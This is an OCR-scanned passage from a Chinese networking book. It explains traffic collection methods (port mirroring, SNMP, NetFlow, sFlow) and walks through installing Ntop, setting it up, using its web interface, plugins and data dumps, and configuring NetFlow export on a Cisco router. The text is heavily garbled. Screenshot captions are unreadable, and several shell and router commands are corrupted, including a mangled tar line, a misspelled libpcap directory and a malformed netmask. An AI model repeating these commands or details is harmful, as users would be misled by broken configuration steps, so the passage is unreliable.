嗅 探 法 是 一 种 常用 的 网 络 技术 ， 通 过 在 交换 机 的 镜像 端口 设置 数据 采集 点 ， 来 捕获 数据 报 
文 。 这 种 方式 采集 的 信息 最 全 面 ， 可 以 完全 复制 网 络 中 的 数据 报 文 。 但 是 Sniffer 技术 的 应 用 
也 受到 一 定 的 限制 ， 大 多 数 厂商 的 设备 不 支持 跨 VLAN 或 者 跨 模块 镜像 数据 ， 因 此 可 能 需要 
在 多 个 网 段 安装 探 针 ， 在 部 署 上 比较 复杂 。 一 般 企 业 网 络 VLAN 数量 很 多 ， 都 不 太 可 能 实现 
全 部 VLAN 的 监控 。 流量 很 大 的 网 络 中 采用 端口 镜像 对 网 络 设 备 的 性 能 也 会 造成 一 定 的 影响 ， 
而 且 对 所 有 数据 报 文 都 进行 采集 ， 在 吞吐 量 很 大 的 网 络 中 也 是 难以 实现 的 。 


2. SNMP 
SNMP 是 一 种 主动 的 采集 方式 ， 采 集 程序 需要 定时 取出 路 由 器 内 存 中 的 PAccounting 记录 ， 


同时 清空 相应 的 内 存 记 录 ， 才 能 继续 采集 后 续 的 数据 。 这 对 路 由 器 的 性 能 将 造成 较 大 的 影响 ， 取 
得 的 数据 只 包含 端口 层 的 数据 ， 没 有 MAC 地 址 信息 ， 对 于 伪造 端口 地 址 的 蠕虫 病毒 无 能 为 力 。 


3. Netflow 


Netflow 是 Cisco 公司 的 专 有 技术 ， 早 期 的 Netflow 版 本 需要 统计 所 有 的 网 络 数据 报 文 ， 
因此 对 网 络 设备 性 能 影响 较 大 ，v8 以 后 的 版 本 提供 了 采样 功能 ， 但 是 Netflow 数据 中 只 有 基 
于 流 的 统计 信息 ， 只 记录 端口 等 数据 ， 也 没有 MAC 地 址 信息 。 

4. sFlow 

采用 采样 的 方式 ， 通 过 设置 一 定 的 采样 率 ， 进 行 数 据 捕获 ， 对 网 络 设备 的 性 能 影响 很 
小 。sFlow agent 一 般 采 集 数 据 报 文 前 128 个 字 节 ， 通 过 封装 后 发 往 sFlow receiver， 数 据 报 
文中 包括 了 完整 的 源 和 目标 MAC 地 址 、 协 议 类 型 、TCP/UDP、 端 口号 、 应 用 层 协议 ， 甚 
至 URL 信息 。 

在 这 里 ， 我 们 不 再 介绍 MRTG 的 配置 ， 主 要 是 因为 MRTG 基于 SNMP 协议 获取 信息 ， 
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对 于 端口 的 流量 ，MRTG 虽 能 精确 统计 ， 但 对 于 3 层 以 上 的 信息 则 无 能 为 力 ， 对 于 详细 流量 
也 无 法 分 析 。 而 这 些 正 是 Ntop 的 强项 。Ntop 能 够 显示 网 络 的 使 用 情况 ， 显 示 正 在 使 用 网 络 的 
主机 而 且 能 报告 每 个 主机 发 送 和 接收 的 流量 信息 。Ntop 能 作为 一 个 前 端 数据 收集 器 工作 
(sFlow and/or netFlow) ，Ntop 与 Tcpdump 或 Wireshark 有 着 极 大 的 差异 ， 它 主要 是 提供 网 
络 报 文 的 统计 数据 ， 而 不 是 报 文 的 内 容 。 表 10.3 给 出 了 对 每 台 网 络 互 连 的 主机 通过 Ntop 进行 
处 理 的 信息 。 


表 10.3 ”对 每 台 网 络 互 连 的 主机 通过 Ntop 进行 处 理 的 信息 


由 主机 生成 或 被 主机 接收 的 流量 ( 量 和 数据 包 数 目 ) 总 计 , 并 根据 网 络 协议 (IP、IPX 
Ee 等 ) 以 及 他 协议 (FTP、HTTTP、NFS 等 ) 对 其 进行 分 级 。 
己 用 带宽 实际 的 、 平 均 的 以 及 峰值 带宽 使 用 情况 
IP 多 播 主机 发 送 和 接收 的 多 播 流量 总 计 
TCP Sessions 报告 | 通过 主机 和 相关 流量 统计 创建 和 接收 的 当前 活动 的 TCP Sessions 
UDP 流量 以 端口 进行 排序 的 UDP 流量 总 计 
TCP/UDP 已 用 服务 | 列 出 由 主机 提供 的 最 近 5 台 主 机 所 使 用 的 基于 IP 的 服务 〈 如 开放 和 活动 端口 ) 
流量 分 布 本 地 流量 、 本 地 到 远程 流量 、 远 程 到 本 地 流量 〈 本 地 主机 隶属 于 广播 网 络 ) 
IP 流量 分 布 UDP 与 TCP 流量， 根据 主机 名 相关 的 IP 协议 分 布 


另外 ，Ntop 还 允许 用 户 安装 插件 ， 以 提供 对 于 特定 协议 下 具体 统计 数据 的 报告 ， 如 NFS 
和 发 送 的 数据 以 及 每 个 过 程 的 相关 主机 对 。 


10.4.2 ”Ntop 系统 的 部 署 及 性 能 


对 于 共享 网 络 , 只 须 将 连接 到 共享 网 络 中 的 流量 采集 点 的 网 络 接口 置 为 混杂 工作 模式 , 就 
可 实现 采集 网 络 流量 数据 的 功能 。 与 交换 网 络 相 比 ， 网 络 发 生 拥塞 时 ,集线器 网 络 的 可 靠 性 很 
低 , SNMP 问 询 命令 和 回应 数据 包 可 能 发 生 延 迟 或 丢失 , 这 时 候 Ntop 检测 数据 也 就 不 准确 了 ， 
对 于 交换 网 络 的 情况 ， 需 要 交换 设备 的 支持 〈 如 具有 SPAN 端口 的 交换 机 ) 。 流 量 采 集 主机 
连接 到 交换 设备 的 一 个 端口 后 ， 通 过 交换 机 的 SPAN 至 (Switched PortAnalyzer) 端口 把 要 分 
析 的 所 有 流量 镜像 到 该 采集 点 上 。SPAN 在 使 用 中 非常 灵活 ， 可 以 监视 交换 机 的 单个 端口 ， 也 
可 以 监视 多 个 端口 ， 还 可 以 对 VLAN 进行 监视 。 这 就 使 流量 异常 监测 系统 具有 了 很 大 的 灵活 
性 。 在 一 些 流量 比较 大 的 企业 ， 我 们 一 般 选 用 两 个 网 卡 ， 一 块 网 卡 作 为 Ntop 专用 嗅 探 网 卡 ， 
连 到 核心 交换 机 的 镜像 端口 , 男 一 块 配 上 IP 地 址 并 开放 相应 端口 (默认 是 3000, 也 可 以 修改 )， 
连接 交换 机 的 作用 是 用 来 登录 Web 界面 进行 管理 ，Ntop 的 部 署 如 图 10.5 所 示 。 
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服务 器 
图 10.5 Ntop 的 安装 位 置 
Ntop 没有 自己 的 捕 包 工具 ， 它 需要 一 个 外 部 的 捕 包 程序 库 : libpcap。Ntop 利用 libpcap 
独立 地 从 物理 链 路 上 进行 捕 包 ， 它 可 以 借助 libpcap 的 平台 成 为 一 个 真正 的 与 平台 无 关 的 应 用 
程序 。 它 直接 从 网 卡 捕 包 的 任务 由 libpcap 承担 ， 所 以 我 们 必须 确保 Linux 系统 下 正确 安装 了 
libpcap 。 


10.4.3 ”Ntop 安装 配置 


Ntop 工作 时 需要 使 用 zlib、gd、1libpcap 及 libpng 的 函数 ， 安 装 前 须 检查 服务 器 中 是 否 已 
经 含有 下 列 的 软件 : zlib (zlib-1.1.3-xx 以 上 ) 、gd (gd-1.3.xx 以 上 ) 、libpng。 可 以 使 用 RPM 
来 确认 : 


rpm -qa | grep libpcap 
rpm -qa | grep zlib 
rpm -qa | grep gd 

rpm -qa | grep libpng 


如 果 发 现 缺少 任何 一 个 就 需要 自行 安装 ， 举 例如 下 。 


1. 安装 libpcap 


# tar zxvf libpcap-0.9.8.tar.gz 
# cd 1ibpcap-0:9-8 

#./configure 

# make&&make install 


。342 。 
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2. 安装 RRDtool 


RRDtool 是 指 Round Robin Database 工具 〈 环 状 数据 库 ) 。Round Robin 是 一 种 处 理 定量 
数据 以 及 当前 元 素 指 针 的 技术 。 想 象 一 个 周边 标 有 点 的 圆 环 ， 这 些 点 就 是 时 间 存 储 的 位 置 。 从 
圆心 画 一 条 到 圆周 的 某 个 点 的 箭头 , 这 就 是 指针 。 一 个 圆 环 上 没有 起 点 和 终点 , 可 以 一 直 存储 
下 去 。 经 过 一 段 时 间 后 ， 所 有 可 用 的 位 置 都 会 被 用 过 ， 该 循环 过 程 会 自动 重用 原来 的 位 置 。 这 
样 ， 数 据 集 不 会 增 大 ， 并 且 不 需要 维护 。 示 例 代码 如 下 : 


Ea ZXVE FEdtOOEF :31ars gS 

#export PKG CONFIG PATH=/usr/lib/pkgconfig/ 
#./configure 

#make 


#make install 


3. 安 装 Ntop 
下 载 Ntop 安装 包 : http:/www.nmon.net/packages/rpm/x86_64/ntop/。 


#rpm -ivh ntop-3.3.10-.x86.rpm 
#yum install ntop \\Centos 系统 
#apt-get install ntop \\Debian 系统 


注意 ,在 Ossim 系统 中 已 经 为 我 们 安装 好 Ntop 软件 ， 可 以 直接 使 用 。 如 果 您 选择 单独 安 
装 可 以 继续 参考 以 下 内 容 。 另 外 如 果 您 使 用 Red Hat Linux、Fedbra 或 CentOS 请 首先 关闭 
SELinux 功能 。 

4. 建立 Ntop 用 户 并 配置 权限 


#useradd ntop 


5. 建立 Ntop 存放 数据 的 目录 


mkdir -p /var/ntop 
#chown -R ntop.ntop /var/ntop 


6. 复制 ntop.conf 配置 文件 

#cp /ntop-3.3.10/ntop.conf.sample /etc/ntop.conf 

7. 设置 管理 密码 

在 执行 ntop 之 前 必须 先 建立 管理 员 密 码 ， 长 度 至 少 5 位 。 使 用 参数 -A 建立 管理 员 密 码 : 
#ntop -A 

8. Ntop 的 管理 员 密 码 重 置 方 法 

Ntop 的 用 户 密码 文件 是 经 过 加 密 存储 在 ntop_pw.db 文件 中 ，Ntop 用 户 密码 存储 位 置 : 
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/var/lib/ntop db 64/ntop pw.db 


64 位 版 本 需 先 删除 其 密码 文件 ntop_pw.db， 然 后 用 notp -A 重 置 管理 员 密 码 后 ， 最 后 重 
启 ntop 服务 就 能 生效 : 


#/etc/init.d/ntop restart 


10.4.4 应 用 Ntop 


1. 启动 Ntop 
#/usr/local/bin/ntop -i eth0 -d -L -u ntop -P /var/ntop --use-syslog=daemon 
命令 行 中 各 项 简要 介绍 如 下 。 


-i"eth0": 指定 监听 网 卡 。 

-d: 后 台 执行 。 

-L: 输出 日 志 写 入 系统 日 志 (/varlog/messages )。 

-untop: 指定 使 用 Ntop 身份 执行 。 

-P/varntop: 指定 Ntop 数据 库 的 文件 位 置 。 

-use-syslog=daemon: 使 用 系统 日 志 进 程 。 

-W; 使 用 其 他 端口 。 指 定 ntop 使 用 其 他 端口 ， 例 如 执行 ntop-w 1900 发 后 ， 便 可 以 使 
用 http://ip:1900 来 连接 ntop。 


2. 利用 Web 浏览 器 查看 Ntop 状况 
访问 网 址 http://IP:3000/， 如 图 10.6 所 示 。 


ase enable make are that the mtop Mond) dhreetory properly matalied 


Global Traffic Statistics 


Name Dree Type Speed Samplng Rate MTU Meader Address PS Addresses 
Nework lacerfacets) 

[emo P| ero bermet o hsml wm hile 
seal Domain Wan 


amen Sire Tp e030 3011 1003) 
av Noedes 人 4 辆 
Traffic Reportfor'etho' [vod 区 并 | eh 
oropped (ivpean) ED ~ 全 pA 江 
repoed (mao) ow 和 
Teal Received (reop) EE ee 
ora Packets Processed A 
ea TREE 
ea ex 可 
ee ew ws 


Acual 547 Kbits 11.5 Pls 
Use Minwte ET 1 Pel 
Network Load Uast 5 Minates 455 9 Kbnls 702 Pitys 
Peak TaNbas 199.6 pit/s 
Averaoe 1847 wb 270 pu 


图 10.6 查看 Ntop 状况 
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3. 查看 整体 流量 


对 于 网 络 整体 流量 的 统计 , 分 别 是 Protocol Traffic Counters、IP Traffic Counters、TCP/UDP 
Connections Stats、Active TCP Connections List、Peers List。 这 几 张 图 表 不 但 能 显示 出 网 络 可 疑 
数据 包 ， 还 能 将 流量 数据 放 到 不 同 计数 器 中 。 对 网 络 整体 流量 进行 分 类 统计 ， 包 括 下 列 情形 : 


@ 流量 分 布 情形 : 区 分 为 本 网 络 主机 之 间 、 本 网 络 与 外 部 网 络 之 间 、 外 部 网 络 与 本 网 络 
之 间 的 网 络 流量 统计 。 

@ 数据 包 分 布 情形 : 依据 数据 包 大 小 、 广 播 形态 及 下 与 非 亿 等 加 以 分 类 及 统计 。 

@ 协议 使 用 及 分 布 情形 : 本 网 络 各 主机 传送 与 接收 数据 所 使 用 的 通信 协议 种 类 与 数据 传 
输 量 。 


通过 Summary 一 Traffic 查看 整体 流量 (如 图 10.7 所 示 ) ， 网 络 流量 会 以 清晰 的 表格 形式 
显示 ， 如 图 10.8 所 示 。 


Nerwork Flows Global Traffic Statistics 


Name Device Type Speed Sampling Rate MTU Header Address IPv6 Addresses 
eth0 | ethO Ethermet 0 1514 14 |1.1.1.10|:10 


Sampling Since Thu Sep 1 16:30:21 2011 [2:02:15] 
Active End Nodes 67 除 
图 10.7 查看 整体 流量 
在 图 10.7 中 ，Summary 内 容 为 目前 玩 过 的 整体 概况 ， 包 括 流量 ， 主 机 网 络 负载 等 。 

All Protocols 选项 可 以 查看 各 主机 占用 的 带宽 和 各 时 段 使 用 的 流量 明细 。 了 显示 网 络 主机 的 流 
量 状 况 和 排名 ，Utils 可 以 显示 Ntop 记录 的 网 络 状况 、 流 量 统计 并 可 以 将 数据 存储 为 kt、xml 
等 格式 ，Plugins 包含 了 Ntop 所 支持 的 插件 类 型 ，Admin 选项 可 以 对 Ntop 进行 配置 ， 例 如 我 
们 可 以 配置 Pcap Log 的 路 径 ， 这 对 于 解决 Ntop 数据 占用 磁盘 空间 问题 很 有 帮助 ， 默 认 路 径 为 
/usr/local/ntop/var/ntop 目录 下 。 另 外 为 了 节约 磁盘 空间 可 以 降低 Max Hashes 和 Max Sessions 
的 值 。 此 外 还 可 以 进行 Ntop 重启 停止 等 操作 。 另 外 ， 如 果 Ntop 启动 失败 ， 你 可 以 到 
/Var/log/messages 中 寻找 错误 日 志 。 如 果 你 需要 设置 开机 自动 启动 还 可 以 到 /etc/rc.d/rc.local 文 
件 最 后 加 入 启动 Ntop 的 命令 。 如 果 你 想 修改 Ntop 外 观 可 以 编辑 Ntop 的 HTML 文档 、 或 CSS 
式样 文件 ， 这 些 内 容 在 /usr/share/ntop/html 目录 下 。 
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和 所 于 二 RedHat 风 RedHatMagazine 央 RedHatNewore 网 RedHat support 


Host Information 


ET 生生 TFTE3 Wiera reneor ET [ees convocts] nee/ ssociaviry 站 CT 


图 10.8 ”以 表格 形式 显示 网 络 流量 


4. 查看 通信 数据 包 ( 协议 ) 比例 

数据 包 对 于 网 络 管理 中 的 数据 传输 安全 具有 至 关 重 要 的 意义 。 我 们 知道 Linux 网 络 中 最 常 
见 的 数据 包 是 TCP 和 UDP。 和 那么 在 Ntop 系统 中 ， 如 果 想 知道 一 台 计算 机 传输 了 哪些 数据 ， 
可 以 双击 此 计算 机 名 称 ， 即 可 显示 出 用 户 各 种 网 络 传输 的 协议 类 型 和 占用 带宽 的 比例 ， 如 图 
10.9 所 示 。 


Protocol Da Percentage 
rep 172.7 moves 997%, 
Pp 1732 MBmes| 100.0% UDP 3503 Kiytes | OX 


cmp 1505 Kaves| 0% 
[Cs EI 


图 10.9 查看 协议 类 型 和 占用 比例 


5. 与 Google Map 整合 : Ntop 中 标注 IP 所 在 国家 的 位 置 


选取 Summary 一 Hosts World Map Ntop 命令 ， 与 Google Earth (谷歌 地 球 ) 进行 技术 整 
合 ， 能 将 收集 到 的 信息 实时 地 在 谷歌 地 球 上 显示 出 来 。 首 先 要 有 Gmail 账号 ， 然 后 到 
http://code.google.com/apis/maps/signup.html 上 申请 Google Maps API 的 密 钥 ， 成 功 后 如 图 
10.10 所 示 。 
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注册 使 用 Google Maps API 


感谢 本 广 册 获 取 Google Maps API 富 印 ! 
意 的 宝 得 为: 


FABRAAAAH Tal4yqbroeUYoADgR_YxTBtghumrBuoay3s-H93ALrqDsRnscELPY9VGOJbFFTOaJJnt5cepsqlpy | 


青 注意 : 有 关 AP| 室 色 系统 的 详细 信息 ， 请 二 况 htp-/code goode comyspis/mapsifso html#keysyslem* 


API 密 铀 的 使 用 方式 避 决 于 太 使 有 的 Gocgle Maps API 产品 或 服务 。 伟 区 有 的 宝 外 适 币 于 Gocgle Maps AP 解 志 方案 的 整个 系列 * 以 下 示 半 说 明了 如 问 在 Google 
Maps API 产品 系列 中 使用 守 乌 。 


JavaScript 地 图 API 示例 
在 JvaScript 地 图 API 中 您 可 以 在 哉 入 AP 时 传 窗户 放置 在 寻 本 本 答 中 
”71 Nove: yo wiil peed to replace the sensor paramerer pelcw with eicher an eplicit trae or false valoe, 


Sacripe src="hctp://maps.g00gle.con/ naparL eapL emp; v=2emp; setsor=trUe Or false6anp; key=ADATAAAAH Tal4yqbroeTYOADgR YXTSEPMUHED 
NOUV3S-K33ALt DIANScELEYPYUOJbE Too JScep39lpe” type-"cens/ jevascripe"ye/ script> 


有 关 洋 细 信 息 ， 清 基 见 JavaScript 地 图 AP| 文档 中 的 加 载 Gecgle Maps API、 
图 10.10 注册 使 用 Google Maps API 


接 下 来 复制 密 钥 ， 选 择 Admin 一 Configure 一 Preferences， 这 时 会 提示 输入 用 户 名 、 密 码 ， 
如 图 10.11 所 示 。 


Non Sm MPa W wn Perm i 


Packet Fiker 

Hosts Worl(® Rese Ser 
忆 web Users 
四 Protect URLs 


图 10.11 定位 到 Admin 一 Configure 一 Preferences 
在 如 图 10.12 所 示 的 界面 中 找到 google_maps.key 选项 ， 并 把 密 钥 填 写 进去 。 注 意 ， 调 整 


参数 需要 输入 用 户 和 密码 ， 如 果 忘 记 了 Ntop 密码 ， 可 以 通过 root 输入 “/usr/sbin/ntop -A” 来 
修改 用 户 admin 的 密码 。 


rrd.myGlobals. /var/lib/ntop/rrd Ed 
rrd.dataDumpFlows 0 [ 
pluginStatus cPacket 0 E99 
cpacket.2.cpacketinPort 0 [E33 
rrd.dataDumpMatrix 0 加 
google_maps_key ADQIAAAAfFTuochHQYRDzoyqEe3-_SBS6yevdwLQqd7116Edk6rSPzlgyRxTnF | [Get) 
meop_webPorr 3000 [Ee 
pluginstarus_sFlow 1 E99 
rrd.dataDumplnterfaces 1 E99 
rrd.dataDumpDerail 1 国 
mtop-daemonMode 1 [ES3| 
mrd. = 72 [ E99 


图 10.12 填写 密 钥 


保存 退出 后 ， 在 Chrome 浏览 器 中 再 次 选择 Hosts World Map， 弹 出 如 图 10.13 所 示 的 界 
面 ， 表 示 配 置 完成 。 
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图 10.13 ”完成 配置 的 界面 
注意 : 由 于 Google Maps 的 限制 ， 不 能 跟踪 所 有 IP 地 址 。 
6. 数据 转 储 功 能 


Ntop 还 支持 把 流量 转 储 成 其 他 格式 〈 如 文本 文件 、Perl、PHP、Python) ， 以 便 其 他 外 部 
悍 序 可 以 对 数据 进行 深加工 。 可 以 选择 Utils 一 Data Dump 命令 ， 如 图 10.14 所 示 。 


(O1998-2009 - tuca Der 二 
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Deum oure| 


ntop Data Dump 


ap is able ia dumo saffe daca In Various formass 人 ea taxt erl, phpl so that Extemal programs can use this data for farther processing. such a iofage na darabase Th page ls the access point for these HTTP daca 


Repor: Type Description 

Hosts Dume misrmasion abour known horts 
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cement interfaces Dump pm where i 

[EY 

Format at 

(Neework Flows .Dump waff mformason ored venwork flows retes te Te» 


图 10.14 ”定位 到 Utils 一 Data Dump 
如 我 们 选择 报告 主机 类 型 ， 格 式 为 PHP， 则 转 储 数 据 如 下 : 


"i1112" => arrayt 
"hostResolvedName' => '1.1.1.12', 
"PktSent' => 12628, 

"pktRcvd' => 32668, 
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'ipv4BytesSent' => 1818480, 
"ipv4BYtesRcvd' => 30936426, 
"bytesMulticastSent' => 0, 
"pktMulticastSent' => 0, 
"bytesMulticastRcvd' => 0, 
"PktMulticastRcvd' => 0, 
"bytesSent' => 1818480, 
"bytesRcvd' => 30936426, 
'ipv4BytesSent' => 1818480, 
'ipv4BytesRcvd' => 30936426, 
"ipvéBytesSsent' => 0, 
"ipV6BYtesRcvd' => 0, 
'tcpBytesSent' => 1813788, 
'tcpBytesRcvd' => 30936426, 
"udpBytesSent' => 4692, 
'udpBytesRcvd' => 0, 
"icmpSent' => 0, 
"icmpRcvd' => 0), 

) ， 


7. 查看 网 络 流量 图 ( Local Network Traffic Map ) 


首先 ， 在 Admin 一 Configure 一 Preference 中 ， 配 置 dot.path 的 参数 为 /usr//bin/dot， 然 后 选 
择 IP 一 Local 一 Network Traffic Map， 就 可 以 看 到 一 张 反映 各 个 主机 流量 流向 的 拓扑 图 ， 篆 头 
方向 代表 数据 的 流向 ， 鼠 标点 击 相应 的 人 P 地 址 就 能 看 到 非常 详细 的 了 P 统计 信息 。 图 10.15 是 
Ntop 根据 网 络 流量 情况 自动 生成 的 拓扑 图 (此 图 为 系统 自动 生成 ， 反 映 了 数据 流向 ， 并 会 随 
着 流量 变化 随时 更 新 ， 高 清 的 图 片 可 到 本 书 配套 的 网 站 http://bjlcg.com:8080 下 载 ) 。 
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图 10.15 ”Ntop 检测 数据 流向 图 
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8. 查看 主机 流量 


管理 人 员 在 查看 了 网 络 整 体 流量 信息 后 , 还 希望 能 深入 分 析 网 络 中 的 主机 流量 情况 , 从 而 
进行 流量 限制 等 方面 的 管理 工作 ， 可 以 选择 卫 一 Summary 一 Traffic， 如 图 10.16 所 示 。 


Abour Summary Al Protocois 


Uris Plugins Admin 


Network Traffic [TCP, 
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图 10.16 查看 主机 流量 
查看 传输 层 的 会 话 ， 能 明显 看 出 接收 和 发 送 了 多 少数 据 包 ， 如 区 


Active TCPIUDP Sessions 
Chient Server | Dara Sent|Data Revd| ActveSince | Last Seen 
d-b54987b3df7c4 [NerBlO5] :1592 opensourcesim :3000| 474| 4.4 KBwes|Thu Sep 1 20:27:10 2011|Thu Sep 1 20:27:10 2011 
中 b54987b3df7c4 [NerBloS] :1594 opensourcesim -3000 | 491 |11.0 Keyes |Thu Sep 1 20:27:10 2011 |Thu Sep 1 20:27:10 2011 
db54987b3df7c4 [NerBloS] :1595 | opensourcesim :3000| 514| 17 KBwes|Thu Sep 1 20:27:10 2011 The Sep 1 20.27:11 2011 
中 b54967b3df7c4 [NerBlo5] -1633| opensourcesim :3000 | 489|11.0 KByes |Thu Sep 1 20.27.15 2011 |Thu Sep 1 20.27.15 2011 
db54987b3df7c4 [NetBlOS] :1634| opensource [ 12027:152011 | The Sep 1 20:27:16 2011 
| a-b54987b3df7c4 [NetBlDS] :1635 opensourcesim -3000| 505| 4.4KBwes|Thu Sep 1 20:27:16201] |Thu Sep 1 20:27:16 2011| 
d-b54987b3df7c4 [NetBIOS] :1678| opensourcesim 513| 4.4 KByes| Thu Sep 1 20:27:25 2011 |Thu Sep 1 20:27:25 2011 
db54987b3df7c4 [NetBlO5] :1679| opensourcesim :3000| 490| 1.7 KByees|Thu Sep 1 20:27:25 2011|Thu Sep 1 20:27:25 2011 | 
中 b54987b3df7c4 [NetBlD5] :1680| opensourcesim :3000| 506| 4.8KByes Thu Sep 1 20:27-25 2011|Thu Sep 1 20:27:25 2011 | 
中 b54987b3df7c4 [NerBlO5] :1681 opensourcesim :3000| 501| 1.7 KBwes |Thu Sep 1 20:27:25 2011|Thu Sep 1 20:27:25 2011 
中 b54967b3df7c4 [NerBlD5] :1729| opensourcesim -3000 | 523|11.0 KByes|Thu Sep 1 20.27-34 2011|Thu Sep 1 2027-34 2011 
d-b54987b3df7c4 [NetBIOS] :1732 opensourcesim :3000 | 539| 4.9 KByes| Thu Sep 1 20:27:34 2011|Thu Sep 1 20:27:34 2011 
db54987b3df7c4 [NetBlO5] :1734 opensourcesim :3000 | 534| 1.7 KBwes|Thu Sep 1 20:27:34 2011|Thu Sep 1 20:27:34 2011 
d-b54987b3df7c4 [NetBlo5] :1790| opensourcesim -3000 | 490 11.0 KBwes |Thu Sep 1 20:28:08 2011 |Thu Sep 1 20:28:08 2011 
中 b54987b3df7c4 [NetBlDS] :1791 opensourcesim -3000| 506| 1.7 KBwes |Thu Sep 1 20:28:08 2011|Thu Sep 1 20:28:08 2011 
中 b54987b3df7c4 [NetBloS] :1792 opensourcesim 3000 | 513| 17 KByes|Thu Sep 1 20:28:08 2011 | Thu Sep 1 20:28:08 2011 


图 10.17 查看 传输 层 的 会 话 
图 10.18 清晰 地 展现 出 各 服务 器 的 TCP/UDP 服务 和 端口 的 使 用 情况 。 


350 


主机 监控 应 用 案例 第 10 章 


TCPIUDP Traffic Port Distribution: 
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图 10.18 各 服务 器 的 服务 和 端口 的 使 用 情况 


9. 启用 插件 
Ntop 还 提供 了 5 个 插件 ， 如 图 10.19 所 示 。 
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emember io nutch he reporpng NC 
[TCR | 
和 [A nore card dembexe ia evaiablc for recording addsional information aa 
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ee The report induces each host prte and oer-voe coumes (sene/receed) Su Me 
Th plugin b ured to scmp, ecivare and deacvare Nerfiow 2upport 
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Ts guon 8 used setup acwate and deactvate reops rd support | 
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nk from the varioas "nfo about hest Door repors | 
i ITRT [1 
ap can borh collect and receive sflow data. Nete that ntap.org is a member of the tlew contorium.| 
Sow faceived few dara i reporied ar separate WIC” in he regolar maop repores 2 [oe 乏 
Remember io swich ihe reportin MIC 


图 10.19 Ntop 提供 的 插件 


(1) ICMPWatch: 用 于 端口 检测 ， 很 多 人 都 已 经 知道 了 可 以 借助 “netstat -an ”来 查看 当 

前 的 连接 与 开放 的 端口 , 但 netstat 并 不 是 万 能 的 , 在 遭 到 OOB 攻击 时 , 不 等 使 用 netstat 命令 ， 

机 器 就 已 经 死机 了 。 为 此 ， 出现 了 一 种 特殊 的 小 工具 一 一 端口 监听 程序 。 端 口 监听 并 不 是 一 项 
复杂 的 技术 ， 但 却 能 解决 一 些 局 部 问题 。 

图 10.20 中 的 图 标 态 表示 这 是 一 台 Linux 主机 ， 图 标 可 表示 是 Windows 主机 ， 马 表示 邮件 

服务 器 ， 息 表示 是 Web 服务 器 。 当 我 们 需要 查看 所 有 服务 器 发 送 流量 的 大 小 排序 的 ， 只 要 单 

击 Byte 下 方 的 Sent 即 可 ， 若 单 击 Host 下 方 的 某 一 台 主机 ， 还 能 详细 显示 当前 主机 的 他、 主 
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机 名 、MAC、 每 小 时 发 送 /接收 数据 包 的 大 小 、 协 议 分 布 类 型 统计 等 信息 ， 如 图 10.21 所 示 ， 
非常 详细 。 


ICMP Statistics 
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图 10.21 当前 主机 的 详细 信息 


(2) NetFlow: 近年 来 ， 很 多 服务 提供 商 一 直 使 用 NetFlow。 因 为 NetFlow 在 大 型 广域网 
环境 里 具有 伸缩 能 力 , 可 以 帮助 支持 对 等 点 上 的 最 佳 传 输 流 , 同时 可 以 用 来 建立 在 单项 服务 基 
础 之 上 的 基础 设施 最 优化 评估 , 解决 服务 和 安全 问题 方面 所 表现 出 来 的 价值 , 为 服务 计 费 提供 
基础 。NetFlow 是 一 种 数据 交换 方式 ， 其 工作 原理 是 : NetFlow 利用 标准 的 交换 模式 处 理 数据 
流 的 第 一 个 他 包 数 据 ， 生 成 NetFlow 缓存 ， 随 后 同样 的 数据 基于 缓存 信息 在 同一 个 数据 流 中 
进行 传输 , 不 再 匹配 相关 的 访问 控制 等 策略 , NetFlow 缓存 同时 包含 了 随后 数据 流 的 统计 信息 。 
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下 面 我 们 分 两 步 走 ， 首 先 在 路 由 器 上 配置 一 个 NetFlow 转发 流量 ， 然 后 在 Ntop 上 增加 一 
个 NetFlow 接收 流量 。 启 用 NetFlow， 定 位 到 Plugins 一 NetFlow 一 Activate， 然 后 添加 设备 ,在 
NetFlow Device Configuration 中 选择 Add NetFlow Device 选项 ， 如 图 10.22 和 图 10.23 所 示 。 

如 图 10.22 所 示 ， 设 置 端 口 可 以 自己 定义 ， 只 要 不 与 现 有 的 冲突 就 可 以 ， 接 口 地 址 填写 打 
算 监 控 的 网 段 地 址 。 


NetFlow Configuration 


Incontng Plows 


etPlow Device [NetFlow -device 2 |[ Set nterrace Name ] 4st 9s mtn | 

Local | =~|[ Setport 
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Flow 
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图 10.22 ”NetFlow 的 配置 


Network Interface Switch 


Note that the NetFlow and sFlow plugins - if enabled -force -M to be set (i.e. they disable interface merging). 


Available Network Interfaces: 
) ethO [id=0] 


Packet-device.2 [id=1] 
letFlow-device.2 [id=2] 


图 10.23 网络 接口 选择 


接着 我 们 需要 在 路 由 器 上 做 设置 ，NetFlow 早期 都 是 在 路 由 器 上 实现 的 , 但 是 现在 一 些 高 
端的 交换 机 支持 NetFlow， 比 如 Cisco6500 系列 。 
首先 需要 全 局 配置 ， 启 用 NetFlow: 


ip flow-export version 5 
ip flow-sampling-mode packet-interval 100 


在 需要 监控 的 Interface， 启 用 NetFlow: 


Interface FastEthernet 9/0/1 
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ip address 192.168.150.20 2552255-255-0 
ip route-cache flow sampled 

show ip cache fow // 查 看 NetFlow 统计 信息 
show ip flow export  // 查 看 NetFlow 输出 信息 


不 是 所 有 的 NetFlow 源 设备 都 支持 基于 Interface 的 NetFlow， 比 如 Cisco4500 就 不 支持 。 
也 就 是 说 它 不 能 在 某 个 Interface 配置 打开 NetFlow， 要 么 所 有 端口 启用 ， 要 么 都 不 启用 ， 重 要 
的 是 无 法 区 分 不 同 Interface 上 的 流量 情况 ， 只 能 看 到 整个 设备 所 有 的 流量 情况 。 

在 实践 中 配置 NetFlow 需要 注意 以 下 两 点 : 


@ 根据 NetFlow 流 的 单 向 性 ， 部 署 NetFlow 时 应 根据 网 络 拓扑 尽量 在 边界 的 两 个 端 设备 
上 配置 协议 。 

@ 对 于 Catalyst 6000 三 层 交 换 设备 , 通过 Supervisor Engine 1 和 MultilayerSwitch Feature 
Card CMSFC 支持 多 层 交 换 (MLS ) 来 实现 快速 交换 。 


然后 是 Ntop 的 设置 环节 ， 这 很 重要 ， 各 个 参数 不 能 设置 错误 。 首 先是 NetFlow 的 设备 名 
称 , 可 以 随便 填写 一 个 。 接 下 来 是 使 用 的 端口 , 这 里 一 定 要 填写 路 由 器 上 NetFlow 的 应 用 端口 ， 
例如 3217。 同 时 还 要 针对 NetFlow 监控 的 地 址 网 段 做 设置 例如 笔者 的 是 
192.168.150.0/255.255.255.0。 如 图 10.24 所 示 ， 每 项 参数 修改 设置 完毕 后 直接 单 击 右边 的 按钮 
生效 ,完成 后 定位 到 菜单 中 的 Admin 一 switch NIC 命令 , 找到 我 们 添加 的 这 个 NetFlow 设备 点 
